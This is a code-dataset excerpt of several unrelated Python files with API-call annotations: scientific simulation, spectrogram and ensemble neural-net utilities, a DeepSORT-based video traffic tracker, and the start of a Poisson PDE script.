phom = np.array(rhom)*0.
phor = np.array(rhor)*1./3.
phol = np.array(rhol)*-1.
Psum = phol+phor+phom+P
w = P/rhoa
a=y[:,-1][0:N]
add=[]
for ii in range(N):
add.append(-a[ii]/3*(rhosum[ii]+3*Psum[ii]))
z = 1.0/y[:,-1][0:N] - 1
if z[-1]<0:
zind = (next(idx for idx, value in enumerate(z) if value < 0.0))
else:
zind =-1
return P,Psum,w,a,add,z,zind
| [
"numpy.size",
"numpy.sum",
"numpy.zeros",
"numpy.array",
"numpy.sign",
"numpy.sqrt"
] | [((162, 194), 'numpy.sum', 'np.sum', (['y[:, 0:-1:3][:]'], {'axis': '(-1)'}), '(y[:, 0:-1:3][:], axis=-1)\n', (168, 194), True, 'import numpy as np\n'), ((201, 230), 'numpy.sum', 'np.sum', (['y[:, 1::3][:]'], {'axis': '(1)'}), '(y[:, 1::3][:], axis=1)\n', (207, 230), True, 'import numpy as np\n'), ((338, 368), 'numpy.sum', 'np.sum', (['y[:, 2::3][:]'], {'axis': '(-1)'}), '(y[:, 2::3][:], axis=-1)\n', (344, 368), True, 'import numpy as np\n'), ((525, 539), 'numpy.array', 'np.array', (['rhom'], {}), '(rhom)\n', (533, 539), True, 'import numpy as np\n'), ((548, 562), 'numpy.array', 'np.array', (['rhol'], {}), '(rhol)\n', (556, 562), True, 'import numpy as np\n'), ((571, 585), 'numpy.array', 'np.array', (['rhor'], {}), '(rhor)\n', (579, 585), True, 'import numpy as np\n'), ((594, 608), 'numpy.array', 'np.array', (['rhoa'], {}), '(rhoa)\n', (602, 608), True, 'import numpy as np\n'), ((617, 631), 'numpy.array', 'np.array', (['rhob'], {}), '(rhob)\n', (625, 631), True, 'import numpy as np\n'), ((1574, 1590), 'numpy.zeros', 'np.zeros', (['(N, n)'], {}), '((N, n))\n', (1582, 1590), True, 'import numpy as np\n'), ((1871, 1893), 'numpy.sum', 'np.sum', (['Parray'], {'axis': '(1)'}), '(Parray, axis=1)\n', (1877, 1893), True, 'import numpy as np\n'), ((1902, 1916), 'numpy.array', 'np.array', (['rhom'], {}), '(rhom)\n', (1910, 1916), True, 'import numpy as np\n'), ((1957, 1971), 'numpy.array', 'np.array', (['rhol'], {}), '(rhol)\n', (1965, 1971), True, 'import numpy as np\n'), ((789, 801), 'numpy.sqrt', 'np.sqrt', (['(3.0)'], {}), '(3.0)\n', (796, 801), True, 'import numpy as np\n'), ((1689, 1712), 'numpy.size', 'np.size', (['zero_crossings'], {}), '(zero_crossings)\n', (1696, 1712), True, 'import numpy as np\n'), ((1928, 1942), 'numpy.array', 'np.array', (['rhor'], {}), '(rhor)\n', (1936, 1942), True, 'import numpy as np\n'), ((1195, 1241), 'numpy.sqrt', 'np.sqrt', (['(rhom[ii] + rhor[ii] + rhol + rhoa[ii])'], {}), '(rhom[ii] + rhor[ii] + rhol + rhoa[ii])\n', (1202, 1241), True, 'import numpy as np\n'), ((970, 1016), 'numpy.sqrt', 'np.sqrt', (['(rhom[ii] + rhor[ii] + rhol + rhoa[ii])'], {}), '(rhom[ii] + rhor[ii] + rhol + rhoa[ii])\n', (977, 1016), True, 'import numpy as np\n'), ((1184, 1194), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (1191, 1194), True, 'import numpy as np\n'), ((1664, 1678), 'numpy.sign', 'np.sign', (['field'], {}), '(field)\n', (1671, 1678), True, 'import numpy as np\n'), ((959, 969), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (966, 969), True, 'import numpy as np\n')] |
import os
import h5py
from copy import deepcopy
import numpy as np
import subprocess
import itertools
class DataSet(object):
def __init__(self, config):
self.config = config
def count3gametes(self, matrix):
columnPairs = list(itertools.permutations(range(self.config.nMuts), 2))
nColumnPairs = len(columnPairs)
columnReplicationList = np.array(columnPairs).reshape(-1)
replicatedColumns = matrix[:, columnReplicationList].transpose()
x = replicatedColumns.reshape((nColumnPairs, 2, self.config.nCells), order="A")
col10 = np.count_nonzero( x[:,0,:]<x[:,1,:] , axis = 1)
col01 = np.count_nonzero( x[:,0,:]>x[:,1,:] , axis = 1)
col11 = np.count_nonzero( (x[:,0,:]+x[:,1,:]==2), axis = 1)
eachColPair = col10 * col01 * col11
return np.sum(eachColPair)
def ms(self, nMats):
matrices = np.zeros((nMats, self.config.nCells, self.config.nMuts), dtype = np.int8)
cmd = "{ms_dir}/ms {nCells} 1 -s {nMuts} | tail -n {nCells}".format(ms_dir = self.config.ms_dir, nCells = self.config.nCells, nMuts = self.config.nMuts)
for i in range(nMats):
out = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell = True)
out = out.decode("utf-8").splitlines()
matrices[i,:,:] = np.array([list(q) for q in out]).astype(int) # Original matrix
return matrices
def pure_noisy(self, nMats):
matrices = self.ms(nMats)
matrices_n = []
matrices_p = []
for i in range(np.shape(matrices)[0]):
v = 0
matrix = deepcopy(matrices[i,:,:].reshape(1, -1))
while ((self.count3gametes(matrix.reshape(self.config.nCells, self.config.nMuts)) == 0) and (v < self.config.nCells*self.config.nMuts)):
matrix = deepcopy(matrices[i,:,:].reshape(1, -1))
Zs = np.where(matrix == 0)[1]
s_fp = np.random.choice([True, False], (1, len(Zs)), p = [self.config.alpha, 1 - self.config.alpha]) # must be flipped from 0 to 1
Os = np.where(matrix == 1)[1]
s_fn = np.random.choice([True, False], (1, len(Os)), p = [self.config.beta, 1 - self.config.beta]) # must be flipped from 1 to 0
matrix[0, Zs[np.squeeze(s_fp)]] = 1
matrix[0, Os[np.squeeze(s_fn)]] = 0
v += 1
matrices_n.append(matrix.reshape(self.config.nCells, self.config.nMuts))
matrices_p.append(matrices[i,:,:])
return matrices_p, matrices_n
# shuffling rows and columns
def permute(self, m):
assert len(m.shape) == 2
rowPermu = np.random.permutation(m.shape[0])
colPermu = np.random.permutation(m.shape[1])
return m[rowPermu, :][:, colPermu]
def create_data(self, nMats):
m_p, m_n = self.pure_noisy(nMats)
inps_p = np.asarray(m_p)
inps_n = np.asarray(m_n)
for i in range(nMats):
if self.config.lexSort == True:
inps_p[i,:,:] = inps_p[i, :, np.lexsort(inps_p[i, :, :])]
inps_n[i,:,:] = inps_n[i, :, np.lexsort(inps_n[i, :, :])]
else:
inps_p[i,:,:] = self.permute(inps_p[i,:,:])
inps_n[i,:,:] = self.permute(inps_n[i,:,:])
l_n = np.ones((nMats, 1), dtype = np.int8)
l_p = np.zeros((nMats, 1), dtype = np.int8)
m = np.concatenate((inps_n, inps_p), axis = 0) # matrices
l = np.concatenate((l_n, l_p), axis = 0) # labels
Permu = np.random.permutation(m.shape[0])
m = m[Permu, :, :]
l = l[Permu, :]
return m, l
def data(self, train):
if train == True:
m, l = self.create_data(self.config.nTrain)
else:
m, l = self.create_data(self.config.nTest)
return m, l
def saveDataSet(self, X, y, fileName = None):
if not fileName:
fileName = f"dataset_{X.shape}_{y.shape}.h5" #
fileAddress = os.path.join(self.config.h5_dir, fileName)
# print(fileAddress)
h5f = h5py.File(fileAddress, 'w')
h5f.create_dataset('X', data=X)
h5f.create_dataset('y', data=y)
h5f.close()
def loadDataSet(self, fileName):
fileAddress = os.path.join(self.config.h5_dir, fileName)
assert(os.path.exists(fileAddress))
h5f = h5py.File(fileAddress, 'r')
X = h5f['X'][:]
y = h5f['y'][:]
h5f.close()
return X, y
| [
"h5py.File",
"numpy.count_nonzero",
"numpy.sum",
"numpy.lexsort",
"numpy.asarray",
"subprocess.check_output",
"numpy.zeros",
"numpy.ones",
"os.path.exists",
"numpy.shape",
"numpy.where",
"numpy.array",
"numpy.random.permutation",
"numpy.squeeze",
"os.path.join",
"numpy.concatenate"
] | [((591, 640), 'numpy.count_nonzero', 'np.count_nonzero', (['(x[:, 0, :] < x[:, 1, :])'], {'axis': '(1)'}), '(x[:, 0, :] < x[:, 1, :], axis=1)\n', (607, 640), True, 'import numpy as np\n'), ((659, 708), 'numpy.count_nonzero', 'np.count_nonzero', (['(x[:, 0, :] > x[:, 1, :])'], {'axis': '(1)'}), '(x[:, 0, :] > x[:, 1, :], axis=1)\n', (675, 708), True, 'import numpy as np\n'), ((727, 781), 'numpy.count_nonzero', 'np.count_nonzero', (['(x[:, 0, :] + x[:, 1, :] == 2)'], {'axis': '(1)'}), '(x[:, 0, :] + x[:, 1, :] == 2, axis=1)\n', (743, 781), True, 'import numpy as np\n'), ((838, 857), 'numpy.sum', 'np.sum', (['eachColPair'], {}), '(eachColPair)\n', (844, 857), True, 'import numpy as np\n'), ((900, 971), 'numpy.zeros', 'np.zeros', (['(nMats, self.config.nCells, self.config.nMuts)'], {'dtype': 'np.int8'}), '((nMats, self.config.nCells, self.config.nMuts), dtype=np.int8)\n', (908, 971), True, 'import numpy as np\n'), ((2616, 2649), 'numpy.random.permutation', 'np.random.permutation', (['m.shape[0]'], {}), '(m.shape[0])\n', (2637, 2649), True, 'import numpy as np\n'), ((2669, 2702), 'numpy.random.permutation', 'np.random.permutation', (['m.shape[1]'], {}), '(m.shape[1])\n', (2690, 2702), True, 'import numpy as np\n'), ((2840, 2855), 'numpy.asarray', 'np.asarray', (['m_p'], {}), '(m_p)\n', (2850, 2855), True, 'import numpy as np\n'), ((2873, 2888), 'numpy.asarray', 'np.asarray', (['m_n'], {}), '(m_n)\n', (2883, 2888), True, 'import numpy as np\n'), ((3266, 3300), 'numpy.ones', 'np.ones', (['(nMats, 1)'], {'dtype': 'np.int8'}), '((nMats, 1), dtype=np.int8)\n', (3273, 3300), True, 'import numpy as np\n'), ((3317, 3352), 'numpy.zeros', 'np.zeros', (['(nMats, 1)'], {'dtype': 'np.int8'}), '((nMats, 1), dtype=np.int8)\n', (3325, 3352), True, 'import numpy as np\n'), ((3367, 3407), 'numpy.concatenate', 'np.concatenate', (['(inps_n, inps_p)'], {'axis': '(0)'}), '((inps_n, inps_p), axis=0)\n', (3381, 3407), True, 'import numpy as np\n'), ((3434, 3468), 'numpy.concatenate', 'np.concatenate', (['(l_n, l_p)'], {'axis': '(0)'}), '((l_n, l_p), axis=0)\n', (3448, 3468), True, 'import numpy as np\n'), ((3497, 3530), 'numpy.random.permutation', 'np.random.permutation', (['m.shape[0]'], {}), '(m.shape[0])\n', (3518, 3530), True, 'import numpy as np\n'), ((3938, 3980), 'os.path.join', 'os.path.join', (['self.config.h5_dir', 'fileName'], {}), '(self.config.h5_dir, fileName)\n', (3950, 3980), False, 'import os\n'), ((4024, 4051), 'h5py.File', 'h5py.File', (['fileAddress', '"""w"""'], {}), "(fileAddress, 'w')\n", (4033, 4051), False, 'import h5py\n'), ((4212, 4254), 'os.path.join', 'os.path.join', (['self.config.h5_dir', 'fileName'], {}), '(self.config.h5_dir, fileName)\n', (4224, 4254), False, 'import os\n'), ((4270, 4297), 'os.path.exists', 'os.path.exists', (['fileAddress'], {}), '(fileAddress)\n', (4284, 4297), False, 'import os\n'), ((4313, 4340), 'h5py.File', 'h5py.File', (['fileAddress', '"""r"""'], {}), "(fileAddress, 'r')\n", (4322, 4340), False, 'import h5py\n'), ((1175, 1241), 'subprocess.check_output', 'subprocess.check_output', (['cmd'], {'stderr': 'subprocess.STDOUT', 'shell': '(True)'}), '(cmd, stderr=subprocess.STDOUT, shell=True)\n', (1198, 1241), False, 'import subprocess\n'), ((380, 401), 'numpy.array', 'np.array', (['columnPairs'], {}), '(columnPairs)\n', (388, 401), True, 'import numpy as np\n'), ((1541, 1559), 'numpy.shape', 'np.shape', (['matrices'], {}), '(matrices)\n', (1549, 1559), True, 'import numpy as np\n'), ((1866, 1887), 'numpy.where', 'np.where', (['(matrix == 0)'], {}), '(matrix == 0)\n', (1874, 1887), True, 'import numpy as np\n'), ((2055, 2076), 'numpy.where', 'np.where', (['(matrix == 1)'], {}), '(matrix == 1)\n', (2063, 2076), True, 'import numpy as np\n'), ((3009, 3036), 'numpy.lexsort', 'np.lexsort', (['inps_p[i, :, :]'], {}), '(inps_p[i, :, :])\n', (3019, 3036), True, 'import numpy as np\n'), ((3083, 3110), 'numpy.lexsort', 'np.lexsort', (['inps_n[i, :, :]'], {}), '(inps_n[i, :, :])\n', (3093, 3110), True, 'import numpy as np\n'), ((2250, 2266), 'numpy.squeeze', 'np.squeeze', (['s_fp'], {}), '(s_fp)\n', (2260, 2266), True, 'import numpy as np\n'), ((2299, 2315), 'numpy.squeeze', 'np.squeeze', (['s_fn'], {}), '(s_fn)\n', (2309, 2315), True, 'import numpy as np\n')] |
import numpy as np
from data.baseDataset import BaseDataset
__author__ = 'Andres'
class TrainDataset(BaseDataset):
def _saveNewFile(self, name, audio, spectrogram):
self._loaded_files[name] = [0, spectrogram]
def _sliceAudio(self, audio):
return audio[:int(0.8*audio.shape[0])]
def __getitem__(self, unused_index):
filename = self._selectFile()
spectrogram = self._loaded_files[filename][1]
self._usedFilename(filename)
starts = np.random.randint(0, spectrogram.shape[1] - self._window_size, self._examples_per_file)
spectrograms = np.zeros([self._examples_per_file, self._audio_loader.windowLength()//2+1, self._window_size], dtype=np.float64)
for index, start in enumerate(starts):
spectrograms[index] = spectrogram[:, start:start + self._window_size]
return spectrograms[:, :-1]
if __name__ == '__main__':
import torch
examples_per_file = 16
dataset = TrainDataset("", window_size=512, examples_per_file=examples_per_file)
print(dataset[1].shape)
train_loader = torch.utils.data.DataLoader(dataset,
batch_size=128 // 16,
shuffle=True)
for _ in train_loader:
print(_.shape)
_= _.view(128, *[1, 256, 128*4])
print(_.shape)
| [
"numpy.random.randint",
"torch.utils.data.DataLoader"
] | [((1095, 1167), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset'], {'batch_size': '(128 // 16)', 'shuffle': '(True)'}), '(dataset, batch_size=128 // 16, shuffle=True)\n', (1122, 1167), False, 'import torch\n'), ((496, 588), 'numpy.random.randint', 'np.random.randint', (['(0)', '(spectrogram.shape[1] - self._window_size)', 'self._examples_per_file'], {}), '(0, spectrogram.shape[1] - self._window_size, self.\n _examples_per_file)\n', (513, 588), True, 'import numpy as np\n')] |
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Class for fwd propagating pre-trained nets in ensemble, one step at a time
- Assume that the same Reshaper is used to process the data, but not
necessarily on the same data (i.e., possibly different whitening matrix
and/or different id_idx orders)
- Hence, receive and return data for all nets separately
"""
from __future__ import absolute_import, division, print_function
import numpy as np
from net import Net
from collections import OrderedDict
class Ensemble():
def __init__(self, workspaces, batch_size, indices):
"""
Load pre-trained nets from files and prepare for fwd propagation
workspaces list [workspace_0 , ..., workspace_(N-1) ]
batch_size int > 0
indices list [batch_idx_list_0, ..., batch_idx_list_(N-1)]
where
batch_idx_list = [id_idx_0, ..., id_idx_(B-1)]
is batch-dimension id_idx order in vec_in for run_one_step
"""
self._n_nets = len(workspaces)
self._batch_size = batch_size
assert self._n_nets > 0 and batch_size > 0
self._id_idx_nb = []
assert len(indices) == self._n_nets
for indice in indices:
assert len(indice) == batch_size
self._id_idx_nb.append(np.array(indice).astype('int32'))
options = OrderedDict()
options['step_size'] = 1 # can generalize to more than 1 if needed
options['batch_size'] = batch_size
self._input_dim = 0 # set below
self._target_dim = 0 # set below
self._nets = []
self._props = [] # fwd propagators
for workspace in workspaces:
self._nets.append(Net(options, None, workspace))
self._props.append(self._nets[-1].compile_f_fwd_propagate())
if len(self._nets) == 1:
self._input_dim, self._target_dim = self._nets[-1].dimensions()
else:
input_dim, target_dim = self._nets[-1].dimensions()
assert self._input_dim == input_dim and \
self._target_dim == target_dim
self.reset()
def reset(self):
"""
Rewind to t = 0
"""
self._time_tb = np.zeros((1, self._batch_size)).astype('float32')
def run_one_step(self, vec_in):
"""
Inputs:
vec_in np.ndarray [n_nets][batch_size][input_dim] (flattened)
Returns:
vec_out np.ndarray [n_nets][batch_size][target_dim] (flattened)
"""
input_nbi = vec_in.astype('float32').reshape \
((self._n_nets, self._batch_size, self._input_dim ))
output_nbi = np.zeros \
((self._n_nets, self._batch_size, self._target_dim)) \
.astype('float32')
for i, f in enumerate(self._props):
# f(input_tbi, time_tb, id_idx_tb) -> [output_tbi]
output_nbi[i] = f(input_nbi[i][None, :, :], self._time_tb,
self._id_idx_nb[i][None, :])[0] # _bi = _1bi
self._time_tb[0] += 1.
return output_nbi.reshape(-1)
| [
"collections.OrderedDict",
"net.Net",
"numpy.zeros",
"numpy.array"
] | [((1923, 1936), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1934, 1936), False, 'from collections import OrderedDict\n'), ((2274, 2303), 'net.Net', 'Net', (['options', 'None', 'workspace'], {}), '(options, None, workspace)\n', (2277, 2303), False, 'from net import Net\n'), ((2815, 2846), 'numpy.zeros', 'np.zeros', (['(1, self._batch_size)'], {}), '((1, self._batch_size))\n', (2823, 2846), True, 'import numpy as np\n'), ((3272, 3332), 'numpy.zeros', 'np.zeros', (['(self._n_nets, self._batch_size, self._target_dim)'], {}), '((self._n_nets, self._batch_size, self._target_dim))\n', (3280, 3332), True, 'import numpy as np\n'), ((1870, 1886), 'numpy.array', 'np.array', (['indice'], {}), '(indice)\n', (1878, 1886), True, 'import numpy as np\n')] |
"""
CV traffic analysis
Video processing
This code creates the VideoTracker class and provides basic command line interface to
process video inputs.
"""
#-------------------------------------------------------------------------------------
# Settings
import os
import cv2
import time
import argparse
import torch
import warnings
import numpy as np
import pandas as pd
from detector import build_detector
from deep_sort import build_tracker
from utils.draw import draw_boxes
from utils.parser import get_config
from utils.log import get_logger
from utils.io import write_results
#-------------------------------------------------------------------------------------
class VideoTracker(object):
def __init__(self, cfg, args, video_path):
self.cfg = cfg
self.args = args
self.video_path = video_path
self.logger = get_logger("root")
use_cuda = args.use_cuda and torch.cuda.is_available()
if not use_cuda:
warnings.warn("Running in cpu mode which maybe very slow!", UserWarning)
if args.display:
cv2.namedWindow("test", cv2.WINDOW_NORMAL)
cv2.resizeWindow("test", args.display_width, args.display_height)
if args.cam != -1:
print("Using webcam " + str(args.cam))
self.vdo = cv2.VideoCapture(args.cam)
else:
self.vdo = cv2.VideoCapture()
self.detector = build_detector(cfg, use_cuda=use_cuda)
self.deepsort = build_tracker(cfg, use_cuda=use_cuda)
self.class_names = self.detector.class_names
def __enter__(self):
if self.args.cam != -1:
ret, frame = self.vdo.read()
assert ret, "Error: Camera error"
self.im_width = frame.shape[0]
self.im_height = frame.shape[1]
else:
assert os.path.isfile(self.video_path), "Error: path not found!"
self.vdo.open(self.video_path)
self.im_width = int(self.vdo.get(cv2.CAP_PROP_FRAME_WIDTH))
self.im_height = int(self.vdo.get(cv2.CAP_PROP_FRAME_HEIGHT))
assert self.vdo.isOpened()
if self.args.save_path:
os.makedirs(self.args.save_path, exist_ok=True)
# Paths of saved video and results
def parse_file_name(path):
in_file_name = os.path.basename(path)
video_name = in_file_name.split('.')[0] + '.mp4'
results_name = in_file_name.split('.')[0] + '.csv'
return video_name, results_name
video_output_filename, results_filename = parse_file_name(self.video_path)
self.save_video_path = os.path.join(self.args.save_path, video_output_filename)
self.save_results_path = os.path.join(self.args.save_path, results_filename)
# create video writer
if (os.path.exists(self.args.save_path) & (not self.args.no_export)):
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.save_video_path, fourcc, 20, (self.im_width, self.im_height))
# logging
self.logger.info("Saving results to {}".format(self.save_results_path))
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
if exc_type:
print(exc_type, exc_value, exc_traceback)
def run(self):
# Base variables
idx_frame = 0
# Create empty results array to be appended with frame data
self.results_array = np.empty(shape = (0,7))
# Loop over video frames
while self.vdo.grab():
idx_frame += 1
if idx_frame % self.args.frame_interval:
continue
start = time.time()
_, ori_im = self.vdo.retrieve()
im = cv2.cvtColor(ori_im, cv2.COLOR_BGR2RGB)
# Detection on each frame
detections_t = self.detector(im)
bbox_xywh, cls_conf, cls_ids = detections_t[0], detections_t[1], detections_t[2]
# Filter detection classes to only relevant cases.
# This is mostly to remove noise as it doesn't affect performance.
keep_classes = [0, # person
1, # bicycle
2, # car
3, # motorbyke
5, # bus
7] # truck
mask = np.isin(cls_ids, keep_classes)
# Process detections
bbox_xywh = bbox_xywh[mask]
#Bbox dilation just in case bbox too small
bbox_xywh[:, 3:] *= 1.2
cls_conf = cls_conf[mask]
cls_ids = cls_ids[mask]
# Uodate tracking
outputs = self.deepsort.update(bbox_xywh, cls_conf, cls_ids, im)
# # Make public attributes for debugging
#self.im = im
# self.outputs = outputs
# self.detections = detections_t
# self.cls_conf = cls_conf
# self.cls_ids = cls_ids
# Draw boxes for visualization
if len(outputs) > 0:
bbox_tlwh = []
bbox_xyxy = outputs[:, :4].astype(int)
identities = outputs[:, 4].astype(int)
ori_im = draw_boxes(ori_im, bbox_xyxy, identities)
for bb_xyxy in bbox_xyxy:
bbox_tlwh.append(self.deepsort._xyxy_to_tlwh(bb_xyxy))
end = time.time()
if self.args.display:
cv2.imshow("test", ori_im)
cv2.waitKey(1)
if (os.path.exists(self.args.save_path) & (not self.args.no_export)):
self.writer.write(ori_im)
#------------------------------------------------------------------------
# Exporting data processing
# This processes each frame tracking data and appends it to the results
# array that will be exported
if len(outputs) > 0:
# Tracking data for frame
tracking_array_i = outputs
# Add frame number to tracking array
frame_num_array_i = np.full((tracking_array_i.shape[0], 1), idx_frame - 1)
results_array_i = np.append(frame_num_array_i, tracking_array_i, 1)
# Add frame data to results array
self.results_array = np.append(self.results_array, results_array_i,0)
#------------------------------------------------------------------------
# Logging
self.logger.info("frame: {},time: {:.03f}s, fps: {:.03f}, detection numbers: {}, tracking numbers: {}" \
.format(idx_frame - 1, end - start, 1 / (end - start), bbox_xywh.shape[0], len(outputs)))\
# Make it shorter for piloting
# if idx_frame > 10:
# break
#----------------------------------------------------------------------------
# Export outputs
# Turn to pandas and export csv
if (os.path.exists(self.args.save_path) & (not self.args.no_export)):
pd.DataFrame(self.results_array,
columns= ['frame', 'xi', 'yi', 'xj', 'yj','obj_id', 'class'])\
.astype({'frame': int,
'xi': int,
'yi': int,
'xj': int,
'yj': int,
'obj_id': int,
'class': int
# 'conf': float,
})\
.to_csv(self.save_results_path, index = False)
#-------------------------------------------------------------------------------------
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("VIDEO_PATH", type=str)
parser.add_argument("--config_detection", type=str, default="./configs/yolov3.yaml")
parser.add_argument("--config_deepsort", type=str, default="./configs/deep_sort.yaml")
# parser.add_argument("--ignore_display", dest="display", action="store_false", default=True)
parser.add_argument("--display", action="store_true")
parser.add_argument("--frame_interval", type=int, default=1)
parser.add_argument("--display_width", type=int, default=800)
parser.add_argument("--display_height", type=int, default=600)
parser.add_argument("--save_path", type=str, default="../output/")
parser.add_argument("--no-export", dest = 'no_export', nargs='?', const=True, default=False)
parser.add_argument("--cpu", dest="use_cuda", action="store_false", default=True)
parser.add_argument("--camera", action="store", dest="cam", type=int, default="-1")
return parser.parse_args()
if __name__ == "__main__":
start_time = time.time()
args = parse_args()
cfg = get_config()
cfg.merge_from_file(args.config_detection)
cfg.merge_from_file(args.config_deepsort)
with VideoTracker(cfg, args, video_path=args.VIDEO_PATH) as vdo_trk:
vdo_trk.run()
print("--- %s seconds ---" % (time.time() - start_time))
| [
"numpy.isin",
"argparse.ArgumentParser",
"cv2.VideoWriter_fourcc",
"numpy.empty",
"utils.draw.draw_boxes",
"os.path.isfile",
"cv2.VideoWriter",
"cv2.imshow",
"os.path.join",
"numpy.full",
"pandas.DataFrame",
"cv2.cvtColor",
"os.path.exists",
"numpy.append",
"utils.log.get_logger",
"os.... | [((8239, 8264), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (8262, 8264), False, 'import argparse\n'), ((9265, 9276), 'time.time', 'time.time', ([], {}), '()\n', (9274, 9276), False, 'import time\n'), ((9311, 9323), 'utils.parser.get_config', 'get_config', ([], {}), '()\n', (9321, 9323), False, 'from utils.parser import get_config\n'), ((905, 923), 'utils.log.get_logger', 'get_logger', (['"""root"""'], {}), "('root')\n", (915, 923), False, 'from utils.log import get_logger\n'), ((1490, 1528), 'detector.build_detector', 'build_detector', (['cfg'], {'use_cuda': 'use_cuda'}), '(cfg, use_cuda=use_cuda)\n', (1504, 1528), False, 'from detector import build_detector\n'), ((1553, 1590), 'deep_sort.build_tracker', 'build_tracker', (['cfg'], {'use_cuda': 'use_cuda'}), '(cfg, use_cuda=use_cuda)\n', (1566, 1590), False, 'from deep_sort import build_tracker\n'), ((3700, 3722), 'numpy.empty', 'np.empty', ([], {'shape': '(0, 7)'}), '(shape=(0, 7))\n', (3708, 3722), True, 'import numpy as np\n'), ((970, 995), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (993, 995), False, 'import torch\n'), ((1033, 1105), 'warnings.warn', 'warnings.warn', (['"""Running in cpu mode which maybe very slow!"""', 'UserWarning'], {}), "('Running in cpu mode which maybe very slow!', UserWarning)\n", (1046, 1105), False, 'import warnings\n'), ((1152, 1194), 'cv2.namedWindow', 'cv2.namedWindow', (['"""test"""', 'cv2.WINDOW_NORMAL'], {}), "('test', cv2.WINDOW_NORMAL)\n", (1167, 1194), False, 'import cv2\n'), ((1207, 1272), 'cv2.resizeWindow', 'cv2.resizeWindow', (['"""test"""', 'args.display_width', 'args.display_height'], {}), "('test', args.display_width, args.display_height)\n", (1223, 1272), False, 'import cv2\n'), ((1383, 1409), 'cv2.VideoCapture', 'cv2.VideoCapture', (['args.cam'], {}), '(args.cam)\n', (1399, 1409), False, 'import cv2\n'), ((1447, 1465), 'cv2.VideoCapture', 'cv2.VideoCapture', ([], {}), '()\n', (1463, 1465), False, 'import cv2\n'), ((1922, 1953), 'os.path.isfile', 'os.path.isfile', (['self.video_path'], {}), '(self.video_path)\n', (1936, 1953), False, 'import os\n'), ((2261, 2308), 'os.makedirs', 'os.makedirs', (['self.args.save_path'], {'exist_ok': '(True)'}), '(self.args.save_path, exist_ok=True)\n', (2272, 2308), False, 'import os\n'), ((2790, 2846), 'os.path.join', 'os.path.join', (['self.args.save_path', 'video_output_filename'], {}), '(self.args.save_path, video_output_filename)\n', (2802, 2846), False, 'import os\n'), ((2884, 2935), 'os.path.join', 'os.path.join', (['self.args.save_path', 'results_filename'], {}), '(self.args.save_path, results_filename)\n', (2896, 2935), False, 'import os\n'), ((3935, 3946), 'time.time', 'time.time', ([], {}), '()\n', (3944, 3946), False, 'import time\n'), ((4008, 4047), 'cv2.cvtColor', 'cv2.cvtColor', (['ori_im', 'cv2.COLOR_BGR2RGB'], {}), '(ori_im, cv2.COLOR_BGR2RGB)\n', (4020, 4047), False, 'import cv2\n'), ((4674, 4704), 'numpy.isin', 'np.isin', (['cls_ids', 'keep_classes'], {}), '(cls_ids, keep_classes)\n', (4681, 4704), True, 'import numpy as np\n'), ((5805, 5816), 'time.time', 'time.time', ([], {}), '()\n', (5814, 5816), False, 'import time\n'), ((7516, 7551), 'os.path.exists', 'os.path.exists', (['self.args.save_path'], {}), '(self.args.save_path)\n', (7530, 7551), False, 'import os\n'), ((2439, 2461), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (2455, 2461), False, 'import os\n'), ((2999, 3034), 'os.path.exists', 'os.path.exists', (['self.args.save_path'], {}), '(self.args.save_path)\n', (3013, 3034), False, 'import os\n'), ((3090, 3121), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'avc1'"], {}), "(*'avc1')\n", (3112, 3121), False, 'import cv2\n'), ((3152, 3239), 'cv2.VideoWriter', 'cv2.VideoWriter', (['self.save_video_path', 'fourcc', '(20)', '(self.im_width, self.im_height)'], {}), '(self.save_video_path, fourcc, 20, (self.im_width, self.\n im_height))\n', (3167, 3239), False, 'import cv2\n'), ((5581, 5622), 'utils.draw.draw_boxes', 'draw_boxes', (['ori_im', 'bbox_xyxy', 'identities'], {}), '(ori_im, bbox_xyxy, identities)\n', (5591, 5622), False, 'from utils.draw import draw_boxes\n'), ((5880, 5906), 'cv2.imshow', 'cv2.imshow', (['"""test"""', 'ori_im'], {}), "('test', ori_im)\n", (5890, 5906), False, 'import cv2\n'), ((5923, 5937), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5934, 5937), False, 'import cv2\n'), ((5967, 6002), 'os.path.exists', 'os.path.exists', (['self.args.save_path'], {}), '(self.args.save_path)\n', (5981, 6002), False, 'import os\n'), ((6590, 6644), 'numpy.full', 'np.full', (['(tracking_array_i.shape[0], 1)', '(idx_frame - 1)'], {}), '((tracking_array_i.shape[0], 1), idx_frame - 1)\n', (6597, 6644), True, 'import numpy as np\n'), ((6679, 6728), 'numpy.append', 'np.append', (['frame_num_array_i', 'tracking_array_i', '(1)'], {}), '(frame_num_array_i, tracking_array_i, 1)\n', (6688, 6728), True, 'import numpy as np\n'), ((6833, 6882), 'numpy.append', 'np.append', (['self.results_array', 'results_array_i', '(0)'], {}), '(self.results_array, results_array_i, 0)\n', (6842, 6882), True, 'import numpy as np\n'), ((9551, 9562), 'time.time', 'time.time', ([], {}), '()\n', (9560, 9562), False, 'import time\n'), ((7594, 7692), 'pandas.DataFrame', 'pd.DataFrame', (['self.results_array'], {'columns': "['frame', 'xi', 'yi', 'xj', 'yj', 'obj_id', 'class']"}), "(self.results_array, columns=['frame', 'xi', 'yi', 'xj', 'yj',\n 'obj_id', 'class'])\n", (7606, 7692), True, 'import pandas as pd\n')] |
"""Poisson problem PDE definition"""
import math
import numpy as np
import mshr
import fenics as fa
